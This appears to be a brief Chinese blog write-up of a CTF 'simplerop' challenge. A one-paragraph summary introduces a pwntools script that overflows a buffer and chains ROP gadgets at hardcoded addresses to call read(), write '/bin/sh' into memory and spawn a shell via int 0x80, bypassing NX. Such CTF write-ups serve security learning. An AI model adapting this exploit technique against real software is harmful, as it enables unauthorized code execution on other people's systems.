本文介绍了一种使用ROP(Return Oriented Programming)技巧解决CTF(Capture The Flag)比赛中的简单ROP题目的方法。通过构造特定的payload,绕过NX保护,调用read函数读取/bin/sh到内存,再通过int 0x80系统调用执行shell。文中详细展示了如何使用pwn工具库进行ROP攻击,包括寻找函数地址、构造payload等关键步骤。
from pwn import *
p = process('./simplerop')
p.recv()
int80_addr = 0x080493e1
pop_eax = 0x080bae06
read = 0x0806CD50
binsh = 0x080EB584
pop_edx_ecx_ebx = 0x0806e850
payload = 'a'*0x20 + p32(read) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh) + p32(0x8)
payload += p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh) + p32(int80_addr)
p.sendline(payload)
p.send('/bin/sh\x00')
p.interactive()
扫一扫
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
添加红包
